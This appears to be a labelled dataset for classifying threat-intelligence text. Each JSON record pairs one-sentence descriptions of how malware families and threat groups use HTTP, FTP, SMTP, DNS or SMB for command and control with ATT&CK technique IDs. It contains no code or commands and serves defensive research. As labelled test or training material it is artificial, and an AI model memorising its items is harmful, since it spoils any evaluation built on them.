{"text1":"Cobalt Strike conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.","labels":"['T1071']"}
|
|
{"text1":"Dragonfly has used SMB for C2.","labels":"['T1071']"}
|
|
{"text1":"Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.","labels":"['T1071', 'T1572']"}
|
|
{"text1":"Exaramel uses HTTPS for C2 communications.","labels":"['T1071']"}
|
|
{"text1":"Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.","labels":"['T1071']"}
|
|
{"text1":"Magic Hound malware has used IRC for C2.","labels":"['T1071']"}
|
|
{"text1":"Siloscape connects to an IRC server for C2.","labels":"['T1071']"}
|
|
{"text1":"The Regin malware platform supports many standard protocols, including SMB.","labels":"['T1071']"}
|
|
{"text1":"4H RAT uses HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"A SUGARDUMP variant has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"ABK has the ability to use HTTP in communications with C2.","labels":"['T1071.001']"}
|
|
{"text1":"ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.","labels":"['T1071.001']"}
|
|
{"text1":"APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.","labels":"['T1071.001']"}
|
|
{"text1":"APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"APT29 has used HTTP for C2 and data exfiltration.","labels":"['T1071.001']"}
|
|
{"text1":"APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"APT33 has used HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"APT37 uses HTTPS to conceal C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.","labels":"['T1071.001']"}
|
|
{"text1":"Action RAT can use HTTP to communicate with C2 servers.","labels":"['T1071.001']"}
|
|
{"text1":"Agent Tesla has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Amadey has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Anchor has used HTTP and HTTPS in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"AppleJeus has sent data to its C2 server via \"POST\" requests.","labels":"['T1071.001']"}
|
|
{"text1":"AppleSeed has the ability to communicate with C2 over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"AuTo Stealer can use HTTP to communicate with its C2 servers.","labels":"['T1071.001']"}
|
|
{"text1":"Avenger has the ability to use HTTP in communication with C2.","labels":"['T1071.001']"}
|
|
{"text1":"BACKSPACE uses HTTP as a transport to communicate with its command server.","labels":"['T1071.001']"}
|
|
{"text1":"BADNEWS establishes a backdoor over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.","labels":"['T1071.001']"}
|
|
{"text1":"BLINDINGCAN has used HTTPS over port 443 for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"BRONZE BUTLER malware has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"BUBBLEWRAP can communicate using HTTP or HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"BackConfig has the ability to use HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"BadPatch uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Bisonal has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"BlackEnergy communicates with its C2 server over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"BlackMould can send commands to C2 in the body of HTTP POST requests.","labels":"['T1071.001']"}
|
|
{"text1":"BoomBox has used HTTP POST requests for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Bundlore uses HTTP requests for C2.","labels":"['T1071.001']"}
|
|
{"text1":"CORESHELL can communicate over HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"CSPY Downloader can use GET requests to download additional payloads from C2.","labels":"['T1071.001']"}
|
|
{"text1":"Carberp has connected to C2 servers via HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Carbon can use HTTP in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.","labels":"['T1071.001']"}
|
|
{"text1":"Chaes has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Chimera has used HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Clambling has the ability to communicate over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Cobalt Group has used HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.","labels":"['T1071.001']"}
|
|
{"text1":"CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.","labels":"['T1071.001']"}
|
|
{"text1":"CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.","labels":"['T1071.001']"}
|
|
{"text1":"CreepySnail can use HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Crutch has conducted C2 communications with a Dropbox account using the HTTP API.","labels":"['T1071.001']"}
|
|
{"text1":"Cyclops Blink can download files via HTTP and HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"DRATzarus can use HTTP or HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Dacls can use HTTPS in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"DanBot can use HTTP in C2 communication.","labels":"['T1071.001']"}
|
|
{"text1":"Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string \u201c&&&\u201d.","labels":"['T1071.001']"}
|
|
{"text1":"DarkWatchman uses HTTPS for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Daserf uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"DealersChoice uses HTTP for communication with the C2 server.","labels":"['T1071.001']"}
|
|
{"text1":"Diavol has used HTTP GET and POST requests for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Dipsind uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Doki has communicated with C2 over HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"Donut can use HTTP to download previously staged shellcode payloads.","labels":"['T1071.001']"}
|
|
{"text1":"DownPaper communicates to its C2 server over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.","labels":"['T1071.001']"}
|
|
{"text1":"During Frankenstein, the threat actors used HTTP GET requests for C2.","labels":"['T1071.001']"}
|
|
{"text1":"During Night Dragon, threat actors used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.","labels":"['T1071.001']"}
|
|
{"text1":"DustySky has used both HTTP and HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Dyre uses HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"ELMER uses HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Egregor has communicated with its C2 servers via HTTPS protocol.","labels":"['T1071.001']"}
|
|
{"text1":"Emissary uses HTTP or HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"EvilBunny has executed C2 commands directly via HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Exaramel for Linux uses HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.","labels":"['T1071.001']"}
|
|
{"text1":"FIN4 has used HTTP POST requests to transmit data.","labels":"['T1071.001']"}
|
|
{"text1":"FIN8 has used HTTPS for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"FatDuke can be controlled via a custom C2 protocol over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Felismus uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Final1stspy uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Flagpro can communicate with its C2 using HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Gamaredon Group has used HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Gazer communicates with its C2 servers over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Gelsemium can use HTTP\/S in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"GeminiDuke uses HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Get2 has the ability to use HTTP to send information collected from an infected host to C2.","labels":"['T1071.001']"}
|
|
{"text1":"Gold Dragon uses HTTP for communication to the control servers.","labels":"['T1071.001']"}
|
|
{"text1":"GoldFinder has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.","labels":"['T1071.001']"}
|
|
{"text1":"GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.","labels":"['T1071.001']"}
|
|
{"text1":"Goopy has the ability to communicate with its C2 over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Grandoreiro has the ability to use HTTP in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"GravityRAT uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"GreyEnergy uses HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"HAFNIUM has used open-source C2 frameworks, including Covenant.","labels":"['T1071.001']"}
|
|
{"text1":"HTTPBrowser has used HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Helminth can use HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Hikit has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"HyperBro has used HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"IceApple can use HTTP GET to request and pull information from C2.","labels":"['T1071.001']"}
|
|
{"text1":"IcedID has used HTTPS in communications with C2.","labels":"['T1071.001']"}
|
|
{"text1":"Inception has used HTTP, HTTPS, and WebDav in network communications.","labels":"['T1071.001']"}
|
|
{"text1":"InvisiMole uses HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Ixeshe uses HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"KONNI has used HTTP POST for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.","labels":"['T1071.001']"}
|
|
{"text1":"Keydnap uses HTTPS for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Kinsing has communicated with C2 over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Koadic has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"LOWBALL command and control occurs via HTTPS over port 443.","labels":"['T1071.001']"}
|
|
{"text1":"Lazarus Group has conducted C2 over HTTP and HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"LiteDuke can use HTTP GET requests in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Lokibot has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"LookBack\u2019s C2 proxy tool sends data to a C2 server over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"MCMD can use HTTPS in communication with C2 web servers.","labels":"['T1071.001']"}
|
|
{"text1":"MacSpy uses HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Machete malware used Python\u2019s urllib library to make HTTP requests to the C2 server.","labels":"['T1071.001']"}
|
|
{"text1":"Machete uses HTTP for Command & Control.","labels":"['T1071.001']"}
|
|
{"text1":"Magic Hound malware has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Maze has communicated to hard-coded IP addresses via HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"MechaFlounder has the ability to use HTTP in communication with C2.","labels":"['T1071.001']"}
|
|
{"text1":"Metamorfo has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Micropsia uses HTTP and HTTPS for C2 network communications.","labels":"['T1071.001']"}
|
|
{"text1":"Milan can use HTTPS for communication with C2.","labels":"['T1071.001']"}
|
|
{"text1":"MiniDuke uses HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Mis-Type network traffic can communicate over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Mongall can use HTTP for C2 communication.","labels":"['T1071.001']"}
|
|
{"text1":"More_eggs uses HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.","labels":"['T1071.001']"}
|
|
{"text1":"MuddyWater has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"NETWIRE has the ability to communicate over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"NOKKI has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Neoichor can use HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Night Dragon has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information.","labels":"['T1071.001']"}
|
|
{"text1":"Octopus has used HTTP GET and POST requests for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"OnionDuke uses HTTP and HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"OopsIE uses HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Orangeworm has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Out1 can use HTTP and HTTPS in communications with remote hosts.","labels":"['T1071.001']"}
|
|
{"text1":"OutSteel has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.","labels":"['T1071.001']"}
|
|
{"text1":"PLEAD has used HTTP for communications with command and control (C2) servers.","labels":"['T1071.001']"}
|
|
{"text1":"POWRUNER can use HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.","labels":"['T1071.001']"}
|
|
{"text1":"Pandora can communicate over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"PcShare has used HTTP for C2 communication.","labels":"['T1071.001']"}
|
|
{"text1":"PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.","labels":"['T1071.001']"}
|
|
{"text1":"PlugX can be configured to use HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"PoetRAT has used HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"PolyglotDuke has used HTTP GET requests in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Pony has sent collected information to the C2 via HTTP POST request.","labels":"['T1071.001']"}
|
|
{"text1":"PoshC2 can use protocols like HTTP\/HTTPS for command and control traffic.","labels":"['T1071.001']"}
|
|
{"text1":"PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.","labels":"['T1071.001']"}
|
|
{"text1":"Proxysvc uses HTTP over SSL to communicate commands with the control server.","labels":"['T1071.001']"}
|
|
{"text1":"Psylo uses HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Pteranodon can use HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Pupy can communicate over HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"QUADAGENT uses HTTPS and HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.","labels":"['T1071.001']"}
|
|
{"text1":"QuietSieve can use HTTPS in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"RATANKBA uses HTTP\/HTTPS for command and control communication.","labels":"['T1071.001']"}
|
|
{"text1":"RCSession can use HTTP in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"REvil has used HTTP and HTTPS in communication with C2.","labels":"['T1071.001']"}
|
|
{"text1":"ROKRAT can use HTTP and HTTPS for command and control communication.","labels":"['T1071.001']"}
|
|
{"text1":"RTM has initiated connections to external domains using HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"RainyDay can use HTTP in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Ramsay has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Rancor has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Remexi uses BITSAdmin to communicate with the C2 server over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Remsec is capable of using HTTP and HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Rising Sun has used HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.","labels":"['T1071.001']"}
|
|
{"text1":"S-Type uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"SNUGRIDE communicates with its C2 server over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.","labels":"['T1071.001']"}
|
|
{"text1":"Sakula uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"SeaDuke uses HTTP and HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"ServHelper uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Shamoon has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"ShimRat communicated over HTTP and HTTPS with C2 servers.","labels":"['T1071.001']"}
|
|
{"text1":"ShimRatReporter communicated over HTTP with preconfigured C2 servers.","labels":"['T1071.001']"}
|
|
{"text1":"Sibot communicated with its C2 server via HTTP GET requests.","labels":"['T1071.001']"}
|
|
{"text1":"SideTwist has used HTTP GET and POST requests over port 443 for C2.","labels":"['T1071.001']"}
|
|
{"text1":"SilverTerrier uses HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Sliver has the ability to support C2 communications over HTTP\/S.","labels":"['T1071.001']"}
|
|
{"text1":"Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"Smoke Loader uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Some Reaver variants use HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"SoreFang can use HTTP in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Spark has used HTTP POST requests to communicate with its C2 server to receive commands.","labels":"['T1071.001']"}
|
|
{"text1":"SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.","labels":"['T1071.001']"}
|
|
{"text1":"Squirrelwaffle has used HTTP POST requests for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Stealth Falcon malware communicates with its C2 server via HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"StrongPity can use HTTP and HTTPS in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Stuxnet uses HTTP to communicate with a command and control server.","labels":"['T1071.001']"}
|
|
{"text1":"Sys10 uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"TA551 has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"TSCookie can use multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.","labels":"['T1071.001']"}
|
|
{"text1":"Taidoor has used HTTP GET and POST requests for C2.","labels":"['T1071.001']"}
|
|
{"text1":"The \"Uploader\" variant of HAMMERTOSS visits a hard-coded server over HTTP\/S to download the images HAMMERTOSS uses to receive commands.","labels":"['T1071.001']"}
|
|
{"text1":"The Komplex C2 channel uses HTTP POST requests.","labels":"['T1071.001']"}
|
|
{"text1":"The Regin malware platform supports many standard protocols, including HTTP and HTTPS.","labels":"['T1071.001']"}
|
|
{"text1":"ThiefQuest uploads files via unencrypted HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Threat Group-3390 malware has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"TinyTurla can use HTTPS in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Tomiris can use HTTP to establish C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Torisma can use HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.","labels":"['T1071.001']"}
|
|
{"text1":"Turian has the ability to use HTTP for its C2.","labels":"['T1071.001']"}
|
|
{"text1":"Turla has used HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"UBoatRAT has used HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"UNC2452 used HTTP for C2 and data exfiltration.","labels":"['T1071.001']"}
|
|
{"text1":"UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.","labels":"['T1071.001']"}
|
|
{"text1":"Ursnif has used HTTPS for C2.","labels":"['T1071.001']"}
|
|
{"text1":"VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"VERMIN uses HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"VaporRage can use HTTP to download shellcode from compromised websites.","labels":"['T1071.001']"}
|
|
{"text1":"Various implementations of CHOPSTICK communicate with C2 over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Vasport creates a backdoor by making a connection using a HTTP POST.","labels":"['T1071.001']"}
|
|
{"text1":"WellMess can use HTTP and HTTPS in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"WinMM uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"WindTail has the ability to use HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Windshift has used tools that communicate with C2 over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"Winnti for Linux has used HTTP in outbound communications.","labels":"['T1071.001']"}
|
|
{"text1":"Winnti for Windows has the ability to use encapsulated HTTP\/S in C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"Wizard Spider has used HTTP for network communications.","labels":"['T1071.001']"}
|
|
{"text1":"Xbash uses HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"YAHOYAH uses HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"ZLib communicates over HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"ZeroT has used HTTP for C2.","labels":"['T1071.001']"}
|
|
{"text1":"Zeus Panda uses HTTP for C2 communications.","labels":"['T1071.001']"}
|
|
{"text1":"ZxShell has used HTTP for C2 connections.","labels":"['T1071.001']"}
|
|
{"text1":"httpclient uses HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"pngdowner uses HTTP for command and control.","labels":"['T1071.001']"}
|
|
{"text1":"xCaon has communicated with the C2 server by sending POST requests over HTTP.","labels":"['T1071.001']"}
|
|
{"text1":"CARROTBALL has the ability to use FTP in C2 communications.","labels":"['T1071.002']"}
|
|
{"text1":"During Operation Honeybee, the threat actors had the ability to use FTP for C2.","labels":"['T1071.002']"}
|
|
{"text1":"JPIN can communicate over FTP.","labels":"['T1071.002']"}
|
|
{"text1":"Kimsuky has used FTP to download additional malware to the target machine.","labels":"['T1071.002']"}
|
|
{"text1":"Machete malware used FTP for C2.","labels":"['T1071.002']"}
|
|
{"text1":"Machete uses FTP for Command & Control.","labels":"['T1071.002']"}
|
|
{"text1":"NOKKI has used FTP for C2 communications.","labels":"['T1071.002']"}
|
|
{"text1":"SYSCON has the ability to use FTP in C2 communications.","labels":"['T1071.002']"}
|
|
{"text1":"ShadowPad has used FTP for C2 communications.","labels":"['T1071.002']"}
|
|
{"text1":"SilverTerrier uses FTP for C2 communications.","labels":"['T1071.002']"}
|
|
{"text1":"XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.","labels":"['T1071.002']"}
|
|
{"text1":"ZxShell has used FTP for C2 connections.","labels":"['T1071.002']"}
|
|
{"text1":"A SUGARDUMP variant used SMTP for C2.","labels":"['T1071.003']"}
|
|
{"text1":"APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.","labels":"['T1071.003']"}
|
|
{"text1":"APT32 has used email for C2 via an Office macro.","labels":"['T1071.003']"}
|
|
{"text1":"Agent Tesla has used SMTP for C2 communications.","labels":"['T1071.003']"}
|
|
{"text1":"BadPatch uses SMTP for C2.","labels":"['T1071.003']"}
|
|
{"text1":"CORESHELL can communicate over SMTP and POP3 for C2.","labels":"['T1071.003']"}
|
|
{"text1":"Cannon uses SMTP\/S and POP3\/S for C2 communications by sending and receiving emails.","labels":"['T1071.003']"}
|
|
{"text1":"JPIN can send email over SMTP.","labels":"['T1071.003']"}
|
|
{"text1":"LightNeuron uses SMTP for C2.","labels":"['T1071.003']"}
|
|
{"text1":"NavRAT uses the email platform, Naver, for C2 communications, leveraging SMTP.","labels":"['T1071.003']"}
|
|
{"text1":"OLDBAIT can use SMTP for C2.","labels":"['T1071.003']"}
|
|
{"text1":"RDAT can use email attachments for C2 communications.","labels":"['T1071.003']"}
|
|
{"text1":"Remsec is capable of using SMTP for C2.","labels":"['T1071.003']"}
|
|
{"text1":"SilverTerrier uses SMTP for C2 communications.","labels":"['T1071.003']"}
|
|
{"text1":"Turla has used multiple backdoors which communicate with a C2 server via email attachments.","labels":"['T1071.003']"}
|
|
{"text1":"Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3.","labels":"['T1071.003']"}
|
|
{"text1":"Zebrocy uses SMTP and POP3 for C2.","labels":"['T1071.003']"}
|
|
{"text1":"APT18 uses DNS for C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"APT39 has used remote access tools that leverage DNS in communications with C2.","labels":"['T1071.004']"}
|
|
{"text1":"APT41 used DNS for C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"BONDUPDATER can use DNS and TXT records within its DNS tunneling protocol for command and control.","labels":"['T1071.004']"}
|
|
{"text1":"Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic.","labels":"['T1071.004']"}
|
|
{"text1":"Cobalt Group has used DNS tunneling for C2.","labels":"['T1071.004']"}
|
|
{"text1":"Cobalt Strike can use a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports.","labels":"['T1071.004']"}
|
|
{"text1":"Cobalt Strike uses a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports.","labels":"['T1071.004']"}
|
|
{"text1":"Cobian RAT uses DNS for C2.","labels":"['T1071.004']"}
|
|
{"text1":"DanBot can use IPv4 A records and IPv6 AAAA DNS records in C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"Denis has used DNS tunneling for C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"DnsSystem can direct queries to custom DNS servers and return C2 commands using TXT records.","labels":"['T1071.004']"}
|
|
{"text1":"Ebury has used DNS requests over UDP port 53 for C2.","labels":"['T1071.004']"}
|
|
{"text1":"Gelsemium has the ability to use DNS in communication with C2.","labels":"['T1071.004']"}
|
|
{"text1":"Goopy has the ability to communicate with its C2 over DNS.","labels":"['T1071.004']"}
|
|
{"text1":"HTTPBrowser has used DNS for command and control.","labels":"['T1071.004']"}
|
|
{"text1":"Helminth can use DNS for C2.","labels":"['T1071.004']"}
|
|
{"text1":"Heyoka Backdoor can use DNS tunneling for C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"InvisiMole has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.","labels":"['T1071.004']"}
|
|
{"text1":"Ke3chang malware RoyalDNS has used DNS for C2.","labels":"['T1071.004']"}
|
|
{"text1":"LazyScripter has leveraged dynamic DNS providers for C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"Matryoshka uses DNS for C2.","labels":"['T1071.004']"}
|
|
{"text1":"Mythic supports DNS-based C2 profiles.","labels":"['T1071.004']"}
|
|
{"text1":"NanHaiShu uses DNS for the C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"OilRig has used DNS for C2 including the publicly available \"requestbin.net\" tunneling service.","labels":"['T1071.004']"}
|
|
{"text1":"POWRUNER can use DNS for C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"Pisloader uses DNS as its C2 protocol.","labels":"['T1071.004']"}
|
|
{"text1":"RDAT has used DNS to communicate with the C2.","labels":"['T1071.004']"}
|
|
{"text1":"Remsec is capable of using DNS for C2.","labels":"['T1071.004']"}
|
|
{"text1":"SOUNDBITE communicates via DNS for C2.","labels":"['T1071.004']"}
|
|
{"text1":"SUNBURST used DNS for C2 traffic designed to mimic normal SolarWinds API communications.","labels":"['T1071.004']"}
|
|
{"text1":"ShadowPad has used DNS tunneling for C2 communications.","labels":"['T1071.004']"}
|
|
